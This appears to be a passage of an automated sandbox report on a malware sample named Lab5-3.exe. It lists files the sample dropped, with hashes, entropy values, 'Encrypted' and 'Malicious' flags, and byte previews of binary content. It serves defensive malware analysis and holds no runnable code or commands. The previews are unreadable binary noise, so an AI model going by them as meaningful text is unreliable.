                                                                                                          Preview:.....l..........@.yu}.....#..5.....?...])Z..QG..........-..3.2.........>.........1......I...k.;....._)...>...m..v....*.&.|.Y.....9..|9.L]....O.\..OuW........2y2..........\|g...I..u.....4.u.w}..D......y.PY...so._..L.....r.?oP../.P.d...5.....}SX..-.H.(gE.H.....k...H1...L........._.g....qVy.[....-....x...$.@.0.=..y3...G\.0JJ>.\.>2..|D.)....7.h.<*.A..h...w.Z.K..8V.1X..n"..7t.a..c.....[.......-.0..Wd..$.O"..J....wCJq..:.v)k....?..,.iz.5\J.eGM..2.A2.].p..;.@&.F.y}...4..L7s....q./].d.%y.Z.....tQ./.....V&.....b...........Q...yfa..).-.......c....GP.BV.."z...*.......0....m..Jq.m0O......O....b.G[.O.{...MH\.1..e......'...97$...i..a..BA.'{.J.!S>...X..V-..p.!fW.l.&..S\O=.45.$r.h.u.s.g.....F.P..vZ@.j...+..v8...}F..A.2DT .0P..18..u..._sD....?....;....|#......)t..}.......UL.......g....KI.`...\&...z....N.X.$..$7.....X.."......>..?zs!.D:'.9....nO^zQ......vC.....z9.....7jns<h.uw:.......)#..?...@...n..\.f2e..B...x.....S@.5j6?LNl...V...o....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21872
                                                                                                          Entropy (8bit):7.991408121048881
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:pixknK12NMSXe0w2vOLwIHbviUxL6x6R+1O+QkJisCKeJLnF0Cy3Ohcr9tb:pi+K1jYe0weWvTxT+ikUHFiOcr9Z
                                                                                                          MD5:62DF708BAA30E6CA9D8E7832D44D49FB
                                                                                                          SHA1:FF26F42516F2BC10216F65403B487F7AD55C66C8
                                                                                                          SHA-256:3B96855714A2BE86D274D1EB6A4EA6EA7653AE6B75CEFC6A6C2398610EAFBD46
                                                                                                          SHA-512:B7089C9372E97F59186E02C0833C4C92A7EBADEED92D0B0BF3B2DE7DC25F0A70F4D2737FA4E185C7DCCE7FA2F05DBAC0B6F26A395F9B1A35EB81D049AF8FAD59
                                                                                                          Malicious:true
                                                                                                          Preview:..k...@s^...W..b..I.N.$...MA..n.q.%..[.....8.B.LBx.Q[..Se....a...4-.&.&..K|.q%Q.k..b.o.i.....A..,.....c$.....4.?.V..jrg.N.q.{.YHi..,...z.....%....V+=W;G....r.X.%.\y7N+<.PL..5@.b.`.UL...JRU.~.........B.AM..y..K.?+..6.4=.Z!rk."..?..Z.......i.....Q ..V...X[e.+......^Sk.b.vY...t..%..A.Q...|..Z..V....0...(.......J..Z....o.m..Ew.=.J..kq..D..r8......|.~r.c.R....(....`..!....0x.....z.Y.../.Q....Y.x(."6..K"K.*m...F...3.....t....nQ.h...j?.w...-R]D;..Pa...6\`.I..........V.Y.+bf....n.. NP......WZ..!..H..S:..0(..z....g......0iTZ.x.`.n7.y..N.)..D.2.E...<.^.._....>.9=.o,.ak.8.+..RkU.U...O..<.Z(~..%..0....H.0...Gn.7..xZ.0>.8._Z.[...$..G......P.+oT].h..Tk.....O..\.s.V.C....W'BFT/..R!.<#..|_....Z.....@..|.<....(....]w.....*.yW.JG...."'..|..k..aJdN..:K..y\..A.sku....L....+.....>.D.62..-.Mt....s.(.........pdW..$....`.F.....>...........4......T.-.8...:..t..H..[N...{.%1r....v......V.]......"....-D.u.+.'...V..!......g...%...j.!.9.....N.#.02x..........V...k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20992
                                                                                                          Entropy (8bit):7.991256113036755
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:7kY0tqm9AKZh44JVeytaODlJ7rHdF2TsyVnG3zYfDARjQ1mtBSui9tb:D+ZhvJZDlJ7r9OG3z+71m89Z
                                                                                                          MD5:F3C7955BC5F9F9F188933B99C8FCE728
                                                                                                          SHA1:67568D09B6A55D3C9B0CB5D1C11A4AEF42A7D14E
                                                                                                          SHA-256:01925E01D46AAF1AA7AF7B3D066F9DA1009480F9F9EB68E99FF7F866B3CED898
                                                                                                          SHA-512:ADB2D55759EEA584F315026797181D3EDD847B8A4DF13C09978C28C57104525063B7B4FB3BAAA124BFDC3D96E8D98F34426803249A17E8D5BE3F5828D76AA583
                                                                                                          Malicious:true
                                                                                                          Preview:.^.<2..<T.u...QB...*..D'V.Y.H.V..`.....Rd_.....^IJ...6..+.T..C!H.v..w..Ph9..@....=...l..l.L.DJ...w.WN.G...2..+.5.-....I.x..j..7........x...,....9?..~..h;..........|x..=...C.....sn...d..E.n..^...m.....I.b.|s.\.I.......!....Hiun.z.Yu>\..!...2.....'.r.R...A.......{.......u7`P=..\I.0..C{{.^yE.@..../............,.E..kH..m|`.3".....d..p.].s....T.p.?1*R`.<.DF...d...*.1..z.".M.Oc..w...+..lA..j.y.P..s.9..-..cx.{.....4.r.,....k.G......`?NO.:fT.7.P..k...9..G...`..1.$E.....W....R.P...PAt....Y....`....F..e......zV...Q.5......../.W.)|.S{..MQ. ....x....aK..i...3..B.....Z..~.W....s....s+.|!.. M...|.......]...Z.....hp.Mz.c...O...1.c.q.Y.p.|.._p....Z..g.\H.....zJ1..W..........<S.`....T.....[V!....)w%............s.?.H.^.......g......r.fM..Jx....qd.{."_..#.(~....Y.&...i.....YH...%|...yK/.m...v....nc.jZ.O.R.s. .E8..e...d..N.11.......F.V....p.Z8..N.h^...o..GS...C/...1..{."...tk..Z6.N.26P.....J.(>R+.?.....|<..^2..[c;..........I.n`..,.v.B^.re....?.4..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22576
                                                                                                          Entropy (8bit):7.992259033349654
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:BUcS3oVhqjVTcbpUce9vbRFgqiHuyHoZMaCH2vU+1QNJNl9rQbtb:BUPgZ8vbR8HzHWsWvUqUl9rQZ
                                                                                                          MD5:9A2D97713CE59C457CFAD0EBFC146F27
                                                                                                          SHA1:64A046F176D3ADE8A14520F2259F5DBD14919E49
                                                                                                          SHA-256:D4404D7AD0E2486EC73EA4DCEBD89905D3A3B7CDEF6C98CA74FBC45F6C9E2B90
                                                                                                          SHA-512:3DDE2C1ECCE03C9EEEEC1A7E39245BFCBAE3050105BD04112D428F42A8991834E0ED21735F46AC4C9106CFA985689E5083E287EADC2D34BE326797D5C1ABFE8D
                                                                                                          Malicious:true
                                                                                                          Preview:k...c.r(;..?..t6..5'v.XE...r......D.f......h..s.DR.l[.Z...W....r.P.69&a.w.....\hL..... .HR=.]..ip08...q.`....>P%.d.. .]r.yM....}.Iv.d.8=[......o..6.V.W@g6.....}i....XO....g........U57\%d.M.2.6dFsr..ii.e]..x......C.:.n2..Z..U[yC~t.+`.<K.".<..R.._Fu^q.......g..(.+G."yt..2L..........h..@..yn....q...]U.......f..'.s.......Q..c:E{...W..\8#]1.U...z.;4..R..J+....A._..3.{0..~c..;....`P.......5O....O&.....a..lZ.h.3..2..G.U..S2..-hF...<.M.W...ie.N...%......]..6.!/g.._Yyb.C.b......&C..YK.....5.......2_.:.h..G(...5..rzG.]._....*....#.pp...3....;.........ec.....y...k4.l.ZG.>.j+.S[7.>.+.4...W#.,D......{...4@6~.O.~....^.&e..N.Of.?;.2+....o....p.6d.C.{....Cu`6VU...._......].,._.O.....~.>...O..{lub.>..<.y..RX...1u..|.7f@...o~......UX.{....>.................[..)G.|....=<C...w.....c+0.., 4...a.......K.......z~..t.q..\....bpl.D...,....*WN.....V.+.st...\.D.&R.....>..(...E.O.}..Ph.B..;..}...o..0.R].c..(...->..s}.P@.....<...S....IiRX.B`..}.._..g.C*>.(....?....^Jf.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22512
                                                                                                          Entropy (8bit):7.991733165243593
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:Qxg4UduVSId0uCEAAKTsY85mMyxSKNkPRh7RQ7KOYI9uMUAuNsnnZKxFtpc/JHwt:yIduVSBqAzTomMyoKiR8KrI9uDsnnZyH
                                                                                                          MD5:FB9B27489E734F4D496BBF136F56F76F
                                                                                                          SHA1:9D9ED3D1C94082420840D8FEDFB56A78B0A89EAD
                                                                                                          SHA-256:F55E50FB34EAE500115B885A2714BF23394AF9F121B34A59D709CE4980762589
                                                                                                          SHA-512:503C3DAB5DB5371CF49D7F667E2BAFE58D28CF3EFE12C6E3624ECB6B0649BA022F0E76A52C23102836B6F026455561EBDB9AFC9D50A5E84DEE1C12F2D5000E3C
                                                                                                          Malicious:true
                                                                                                          Preview:..W`K...........6.fnz.......V.R.t.C......f9.....D.f.p..8..N...M....}.n"......#<<.u.B.,.Gda..r-T.>.ip6.0=..%f....(.8.......S.....s.H8.. .|*....../...q.0.t..dar^o^..X...N.c._.,47........mC.O...9.L.=.'b......J#...H.)....k.6..y..ET6....p.:".|...P.u.c`9 ...!dV.@Y....F9..y.M.|..).0{T+.dF..u.=#.R..../].MR....y..jR_...\...Q..b.r;~Wp....}...P.7.l..Ba.....e....S!201l.........$!..Bs.R.b...x`..j]J..c\...).:p.\Pbu..[.hT.#V..o..v.<~Ubh..]....c.......fB..y"p.0.d.b+...',xRV.J.X....J+..=:Mi6......i.......W.='....a.v.............;..R.j..n..6..%......l!|.@8y...E............w...L.q.....h...Ios.6..e..QDbf..P....V.B.J'..D.......:.,X[67...._I....7.<3*.............i=?q..D....AH.^.Nz..H.H.5I4...........c....]b7.a.c..y...=Fg..#.~).h..i~.P). :......m.wU.*3.YI..c....~:O......c.T..Xa.p3.........I`;...Le.....SAP.4..\.lm...:..~..f.V.)...`.....Nm.4..P~.u..m*..@.HD..E......._E...>'.bm;...S..&..r\....C.&..DF8..K........]Sq....t5@.a...Q%.BG...o1. .X.Z.(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19440
                                                                                                          Entropy (8bit):7.991472186690164
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:6sTF3jB/PONEXp1enKWgVWxxEPj7EB+OnfiWhpKjW8bIRaos/xtb:6Cn/GaXpUjKWx+L72iWhKxn/xZ
                                                                                                          MD5:32DDA01CC7F2FD77600DDCF8AEACE2C4
                                                                                                          SHA1:2EDD97A90F0C864376FB937C5A98217018C342BF
                                                                                                          SHA-256:C78A6E526CA94EDE7005840FCBAE18791214A0BA0BE221D25F5D4A755DC41EA3
                                                                                                          SHA-512:F7C22334EAD5FF8573CEA07CEF95E314C6E476FF7B4378BBA86BFC5396FE1F475AC92EF8238D6813A647D7ED67B6DA3A466A69F6415BFA6E4ABE43DC16A4E1BB
                                                                                                          Malicious:true
                                                                                                          Preview:3.-......P....P........W.%..S..ex..v....;...b.B..k.".r(.y..v.Vm(h8..5s..?C`. ...\4)......Z...%.Xk.....(........Eq6F}.T..J.2....m.a.$..(.|...#.X.>.o..5....?+...m.i.h...@...J..<Q.....:.~y.(..L..].G._....P..kH..A....."..$..L..=.Rg.%.......3Bq....c..INWu..%...}a.5....t'..6..{....*I..T..1....)..`...X4=.b1......2wm.....u..5V...Z.-...^..^.TN`...E1.B...st..B../C....@.\......qhTB......l..`.l...ZI...q.w....v%.N.o..Dw. ..C.... ....W...i.[.:.j.5.....Y......k..8...K..fG.^^...fn..l^.a..=.hf](&W#'..9..ng>........K..*.....Ef.?........e....r._.c#.......zt..(.n].mM.Zi..T..6p"...Oa.....d`n....Z.7.7.E.Ki..).l.Se[M.v#.V.8.@eo...dNK*..(4..^.)L.i...%'..NE./.kt (.......^...H..T.NORLI.&..D.zzK. {.8[-r..E.Xm7]M.O...NI.$5.!.Lw....y>...C..d.5....wm....D7Eu....*......<.M'.k...>..E...t).A...]H.;@.0..K......:X=...N..k.........._ &...A....6...BO..k.R.P......V.|.=}./Mqr..l?...H....C..F..B...%.?x...h.@.....sg.D.k.y;.....X}...!....!.Q...Q.*.$...o...i.p.g.,...<,o..lA}9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21376
                                                                                                          Entropy (8bit):7.99114919421002
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:WpmJKgcu/TK+dexhylkf4FBhYFrpGDjrTDC/vFfiLNv6e/KnwWtb:WpOKJu/deKlD1YFrpaKVK5pYwWZ
                                                                                                          MD5:597B1E658282FDE934273A5EA280CE60
                                                                                                          SHA1:FE6A402B0764DCD9F9C0972721F88BF181BD34B3
                                                                                                          SHA-256:36B915B3D3518D3619BFDF6933E432F5D225CDBF664B157CA5CD8E29B4B7B93B
                                                                                                          SHA-512:35FD4A46F932613B44C66E8603F04186CB4D45B8AF410C18C2351B849E4BA8931298AE9CF437A5D9208D61525FCAC0949DA7756D50E77CD6CFBD33CCE95A8B90
                                                                                                          Malicious:true
                                                                                                          Preview:..+.K.....wi...1.....H!...k.)Y)m ....xR.0@t2...`#.c5.....l..vP.K.\.]+Z........Q^C<..)..T..&*.(.<.>.=.J6....8....T.k.Q....j.....t.F.^.FT....o.gA.."..\.<.f]...g:i.q.`.jj....Y.....;.mh..7..Eh..G.R...r..]>.1Q....a...)../.A.r..4.../.M"..s.*.~.6.....}p($...?N.H.`>..3o.|0.=..bX.kD9~..K,zh...Y\...9..."D.*8.^y....\...U..g.}....J..a.bI.VoD07.*.w.1..{.....Xf{`5 .X...y3.r.... ...0............f.....%.......%0sc.[.....#;._M.S9...Z.j}....~.uf.v..q...0=.P...W.....c.Q...kU.)xy.[.h-....,B9y.W.e...a.K.>.....f,.W....).:....^q.f.at...f.v.....].......|...... .....C...N8....%I.M.........zP.@A.]..<..i..A..<...$.).~o9GZP.....-.O....WH.K>.f.z.a....C*...(......V..F=..._x...).bb...d.D.}m4S ..NA.....X..c;..!cT^.R...............}....;....mCk.@I...u.....$W{.P0.D.!.q...Z[>.Wg.e..A......z.@.SI..{......q...?...7ME..s....F..h~..+..M8....-e(K&.].~..p.._.E....{Ik......f.2.Wd..2.Q.f>.gF....&u=.F._d.^..E/.R.p.~...(>.....E(*...g...s!..f.....i.`f....A.......(+....c5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.934921162315536
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1rriNVm6HzEMqXavFVhST1yjpcYmMzr8ZFPU4X7YcxqHfUTid3hBaUoSGFcmeykt:1rWNE6HAxXadVhSBFMkcCTFGx0uKeY2b
                                                                                                          MD5:87646E7CF5523D6CF9DC511A489C68F3
                                                                                                          SHA1:0F3A9794BCBF07641BD4E51E78F8D06D44B383B2
                                                                                                          SHA-256:C6EEA793E65BE41D115FAE06520A3F26F878B750007AF554380A90EBD72AB177
                                                                                                          SHA-512:EAD0965A3F60E442BB32077E7DF8416F2E8E5F9EF91941665E67E0E0260AC6380ED8A43975D3CA13569442C9C3C58A7A7ED4E1BD9F95A577B611C79E643E1004
                                                                                                          Malicious:false
                                                                                                          Preview:F@&].....AI.......O......v.*..O..2...0...^Mn.....u4....-.....#.xO..o".G/^.._.D.f /.:.L.Y.s'}..U.....<.0>&.......$q.z.:B....i)..~.gA,..G'.:.zLd..Q.%yU7O.b.....E|......y5hmQ..z.$....(P8...^..l..].\...y....}.......`.f....m=....6yA....4.e...J.....L...;.pg..5.....%}..4.$v.<?D.7{...L...D,......).T.U#I......7...L..........0.7#..R.Xa.O......|L))=.|^3%.}NJ...}....G..O...;....6..j....I.j.Xjpm.1..ro.....ZH.D.qG..4.M.pZ......"......y.............Un...f..L}./:..=.f.........*],{ ".....|.Vd:........!..YmF}..=..Q#x......B.,e..Y.E.$H)....8...xsE..L.v....."....6...>.xj.`'.?..,,?p..a.~,.x.V0.........L..m.Jc......V..Xk.D4.........B..p.45....p..X.....|...Gn.jb0.. .V......U.t.............@.X..".`J..v.[9 .......-.jd..X|..Q...3...ry..?e.............C.m.2.xY..{....>&".}..V..UJ2...=I.......u...2th..%:.Q;2.=....8..81..?.k.=c....N..#`..C......u.Uw....^.....#[.#..2K.!E.Pl.Ys.}..C..$...7. ..<.^>.%...Y.....<.u.E....|.@,..TX.hh.6..0.Z...H..........3fO
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4208
                                                                                                          Entropy (8bit):7.957791342300476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Jnbu7Fqog1vK86yvOmWAmtChRYycMntGx0uKeY2ElUJ:Nuh7pEvOmWtuRYlr0Cb
                                                                                                          MD5:80C0B14C3474696A8DD6219A9F15E5C6
                                                                                                          SHA1:5DCBEBBC3EB3EAA240F7DF8635ADFF532B93C74A
                                                                                                          SHA-256:E6AE214DAC82CCC27D1D8372B05989A6AB579024F632520BBCB2CA498FB6B89A
                                                                                                          SHA-512:E67BF6D752A97959FF808BE4F0C52EE1225D26CD730D23F34B9C1997D3CF99FEB7EF9EB13F48A206FC5491DEE3BDB73BD4997F6B379AA95A630E8A9187CEB05A
                                                                                                          Malicious:false
                                                                                                          Preview:.i#......o.fn.bR..brD....G...#.E.|...%,..$..8...... .....o.......)0.t.{.BY7.ADF.$..#XK.|E..G...Bj=o.........O..,...7..7...`.s..=M..g..rskY0.5.....G.k...:..,.kI.........n..*...a...p`.B^.........).../.........{...T.v.&..P {..........8.0S)`q.....W.).s..9.8..-.U......./+.zu........%....<.s..E..Rg........tP.I.;.a......; ...M3Gfs......h...s>I..%...D-...3:.>....:.G."v...Qz|..T.c.C.X.Y&...I.ypd..-.V[.d^ ...7..5S...G..ys..W>...{..v....{.W...4"....4...$.......y8j..#..&......n|..;......2...W6.s.....c.O._.6..`..h./.8......K..y.....x.Qw....'jN.M........-....c..RX5.Y...t<...>^VL..Bl_eK.hV+...QN..NK......[........s$.bH....\.*s.w.v.....(.,|..!.f..BG..&...DSK.b.r.?."|.?...Y.:.U..su.OMe....6..a.&../....@..F..u.)t.|......'j.......s.~i...)...F..K{.m.=f.....m..,...V1..Q...(....<#Z..........8...w.s........6.|..~.h..S..].Z..h.J....j?G.L{4]((.X.."........s...B..|....y.mIX.;.X...G...N.....:..".V......p/9...T~.b...,t.yY.H...M...'...q.r....*...}.oU-^......f3Vf....:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2585441
                                                                                                          Entropy (8bit):6.063366708497783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:f7ZP/I/AaJURJkHRIvdxOhYIe54tdwJpQawCv13iRGP7PWTppnju4ywKv:fNPw/AaJURJkHRIvdQJteMC
                                                                                                          MD5:901132E22B3BD1D0520FB3A7A89E7F25
                                                                                                          SHA1:EA413EB77B55D52197F4463625CE108502B8FD51
                                                                                                          SHA-256:8D70817B657E3A1B6761E4E99DFBD04E67697359D5711713FC8C418CEF7F7FF1
                                                                                                          SHA-512:BE6AB1715F9D2CB397580EEF1147BC4AB62AD26BB96EB6B1D51186520EE125F18E37F71F50719BCA2791D0364E428973C16488921E08E90F2F08730AE7AAD47A
                                                                                                          Malicious:false
                                                                                                          Preview:.R.K*.<..P..h.Q7...j...4<...h.*......p.'@....!....6..F.go....[.cg.....r.1.EQ.;&.-.+/?.....8.`....>.&....9z.j.mk.uf...........o..m.Uo.l....^....t&d.5. .$.{WB..A;>...v.6p....#.j..H..........p.Mj..t.}..4>....P.A.Z._..8<_....?. N~5J...."..N.[....B...........(.C..?U..U.$.._k....l....L>.L...Sq<.....iX..}n.yM....ky.3.z.....K.>.....1....>..h.W....RYn^%...... .|i..o!.j.F...V...H.....bU.(x}Gs.....k.g#..L..%.2.*;...\w.+q......\$....9<..\.~oY..q.....y...........QGo.K\..B.cXx.n..8F`..ws[.\..FP....Y..........9M..b...B.*....b^...Ceyim1U!.....W+.......UY.u....S......],.0..B....e.y..L....J.;.q.b.......{5.Y.q.....M.C...|.`.j.kYd..s.3<z..).y.^.........lJ......n...]a\M..qU.3..w..DN.['|..<H.....`.l#...=...@n4.e.....b.pM...vm....t..#_..I.{.I....Xu.h_.zo...4&./"..w.1..G....H...W.....*o....+.....b....{.KQW-(.......-^.....5."..x....j.b0F0-k0.....c.?.y......:.....R......k~.x:2q.)......;....v".b?...I.a..&BqI....M@Z{...m....J.&..}Df2...d..H....Z..9..S..T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.934408489195762
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PcuvguqDWIwmn53F0wMqygIXQ9rmHfUTid3hBaUoSGFcmeykEdEElU92i:PTvxqaHm53F0TqygIer5Gx0uKeY2ElUJ
                                                                                                          MD5:026473B16FB450687E8DDF85B7E170EE
                                                                                                          SHA1:E479E707A63AA96B0FC672DB113E9556D3399EB4
                                                                                                          SHA-256:650A72D2D2AE1A41469178E7A7B142160AF5F866FC4FD06BF4AF97C7D9E72D48
                                                                                                          SHA-512:6A165F4352DB91106D56520B1D4AC81C16E12E5755DAD9940DAEF864300D261E209128322D78D68428601D7DA45BDC6B17D91B678D67D5EFC9FC90C0D33FFA9E
                                                                                                          Malicious:false
                                                                                                          Preview:&.*....'.(q...U#...ed....yH~.(..DC..N..k..j.-.F. Y.!P...LT.k...S.e=.).>.P%..n..1r.p.U.K....r...R..*.'...a.$FB.s}.....x...6.P...oy3v1.....k..g.1....:.2.3f6.N.B.Z)...}....N.}.*...C......kf......O..O...${.V...]..WL&:K?.:......DR!...\#.D...P..X...*..\.....,R.X.<....N..>^X..%.G."e<...e.....4.).......a.....^.....s.4!_...xs.1@si...?!.d!..!....e..X.`.3.RoJM..1..Z.o3..+@$..F.q.....|..Y.2~n..p.W].\.O..LpS..q....@e1....?i.=.4.{.B....z..=;}Os.L9..`owO...r..o$.?..my..o4.;........`.r..f..er....>..p+....u....}......Q........T.~..b4...m.4.Tl2#.!.wS.......C..!.Y....g?...z%.....&.u.b...b.e.:...@..8...F."]...e....%......M-.W..7..7.{x.$.Gj..K.R&.6.......].|...L=5..9..=..;.TMD.....L.U$.T'.Z.`z..I>.t..(+...c..r5.rMrK.Z_.f...yPd_.....ML.A.C.b...g...u..~.].$_.0.s.-.R*EV...1........~.}l3../......f.J.a0..t..q..F5.v..y#.:K....=..8..... .=*7..%U...L.).......%mA.e.!..........;.e{.if...[l...+.##..x.f....E.H.NI.J8"..;.a.l.,N....6...j.....6..Z......y...)...y...+9....g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.911164701346737
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ps68am9+lMlHfUTid3hBaUoSGFcmeykEdEElU92i:wl+lM+Gx0uKeY2ElUJ
                                                                                                          MD5:B6DD82B9AA28F8E3A302C4C58CD03667
                                                                                                          SHA1:605CC915C28362B1D72FE7226AA5F588FF685E4E
                                                                                                          SHA-256:72B9A1CF8418EA8930E8E45C8BFB8F003C759B2B3B153F2A9E726564445A2CAB
                                                                                                          SHA-512:CD17FE6C8209E2583F94BE22908B2FED5AB7F80ECC2E8F87F28DCE2DFF4F17E0858B644EBC59013125FA2E33438A44DD7F2B7777D06D74B9D4AC34D3E2289361
                                                                                                          Malicious:false
                                                                                                          Preview:...H.5^C....Ba.QQoC.yjcR.0.Dq.u.f....yT..%..L.]....=...../.B.(=.....C..2....X..{.%......h.E;..t.[...EU.u...........Jb.e1..2j%..4@.OJy.gU.2ZP...3.1.`8e@..i..$..K.A......s.....v..1...N...:.T.[a.9$.,uA..xv.b.6.2..s....`:I..4.$.+.E,s.w.p[a..M.......y..x..."......l()M..^(..Z.O'?.7..BH...T0=...WW%.........E.'.....>..v....C~v]?I"=Ix.$...|.E........n+..!...g.5)..-r`..$.....b...Mg.E0.uw.M.g...h.P.....!...^F....6.bB5.c..%>s#...L.=.vD.k..R.....yj..:mGm..0Ct.m.Z.....a.2o............Y..+.R`..5Z.....0...........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4560
                                                                                                          Entropy (8bit):7.961180962520505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9IMRHy0fZeZG3ng6jVG5+k/oNl64zLTtbpzUMM4yiGx0uKeY2ElUJ:GiBHng6Zu+kAN37TyB0Cb
                                                                                                          MD5:671FB7D451CA85A04BBDAE93721FA0DB
                                                                                                          SHA1:AE89A75806E887AECF8DE62391FE02B120164C6A
                                                                                                          SHA-256:7F84826319755B377017A752F0052A3706E2F7CF951C93DAC6FEE2E9B8BBB1E8
                                                                                                          SHA-512:598686DEE9002054C24BCF16525C622FA3C0DF81192F411A176697CB920F4FA2585897702953B14ABD4280A681B84375BBC103220BED86FC0533D59AED11BB06
                                                                                                          Malicious:false
                                                                                                          Preview:..,../E...~bybr.N.5..............S.I.g..s.?!...'.~...{../....u[.C.....B...."..h.fB..UO.m..0...4B..;m}.x..q..s.,[CJO..f......Z..\..!P.06\..].0.FT.......,.Y.Ii.f...(.J....yy*.n..IK.....An.B5.$0.......2...../.......:...2.,Y.iP .KT..<..9qnJI..S~....W....`Q.D.S"......5.$..MR.J..^...k...............$...(.!|Uf.`.Tl......(.3....)$...b_m.....u...-..Z.Z. ..UD.7J.....,..{....2+...i[[..$.jV4.......1..........0....u.V..Ml..@....d...)y..(G`R8u..G.fO?,...k..@s..).....Z=F.d......].....l.id..ID..2I..N..$.GQ..X.Y.77.mL..C....Eg......v1."......I\L.Q..Y.:.:..3-2.O. K.<...O..H...r...Q.$.z...:....!9..,......U....,.k_G....@.[.4.j.&..\Ex...).n.....=m8...Pn.f.......> .E2......K.R5....T."...3.#...q.QW.....*0...&.!u.>q|.?../....qk...@..:.$k......m.*iF.9.......Y.ai...../...0..M.....Fv...&n.~o'.zas....d...iQ ..98.@...[.W.....a*.,I..D..0;.1..~..%..{....2..y..qx.Z...l.h....K~.......c[>....Q.Yxw.......Vl....J.fc..[.na...~h.PL/.'e..yR.|.t(._..B.n..Q.p....:^....?.......h;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68544
                                                                                                          Entropy (8bit):7.996974494520449
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:QccZDck5XBw6lIaDKxtztgOkpkaz1FF5six7DZS+hD9UVTZ:RcCkNIkkaxFF5siPS+MVTZ
                                                                                                          MD5:C81F8903384EF44B6FE38A42C82FD1CE
                                                                                                          SHA1:1157AA30EB9C677876A72E12EAB37AD38C5AD157
                                                                                                          SHA-256:18D3F94DA1F83E11C840D8CF01E9C8C0CAC4B7DE111AE3599530B1C46FDFF28F
                                                                                                          SHA-512:B3D08F3687B4F9AFCD6C0F6EE5773014586236795FB66DCAA1B10725303D70B6141C66C7BE13E8C0E5E9187F453D5DB9A469C7A6D2D2D551E3A3D2ACB4251FA8
                                                                                                          Malicious:true
                                                                                                          Preview:m..=.....w...4...].rO4......L.....c.o..p.k..(\]./.)5Yl........Ml._.^...x.X.&K6.0c......Y.+..d.u@....p.\..K..>.).y.S.i~...EDM..r..gaR.X.q..V...........m...TG...7r...8...>....j.....w.".t.{....h.+..%..6#....i.\.[....&L.....De."?.9..+..xKo......Ua.'...C..r........Ex..J*L.,(d.@...qDw..)504.6...C~!.q|m..=.>..k.....?....C@K...D.x}.u..A..J?.n.K!.,u.~fs5.2}.C.PO.{A.....5w.Ri5w......hf..j..N....x.i.40."...t...s8.........]..E?..pb.....X.QAP...;T.G.!g^.ry.f..-(e2.[y..w[.=..{...:....T...).....I.c.....7..Z.}.w.|4.=_l. .S...M.(.}....f..-.u...}..MG...n9.0.a.......;....~..;t\..CTM.../...2a,..\....b%H`....@.......R$.m~.D..M...QC.-.ay.U<.Yh4YV.uu.#.0n.......@f..A%.._S.....F.....;..<..z.V...6a. ..mtg.-.l..=..,./.....U......>yd...j...w..n.[ ....4....^......d.....'...w..~.P%..H{..$...l........3...(...f:....=....z...o......53..^...NI.Y._wL +h.....QVi..wg..^..v.d0H..O~_?$.P.........EI....1#pZ>.....X..e..g.z.."0)ey.1.%n....[@..7..D.`..!..r..Z..]......g...s6.U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1936
                                                                                                          Entropy (8bit):7.901407298249807
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+X7TtZsHfUTid3hBaUoSGFcmeykEdEElU92i:qtZrGx0uKeY2ElUJ
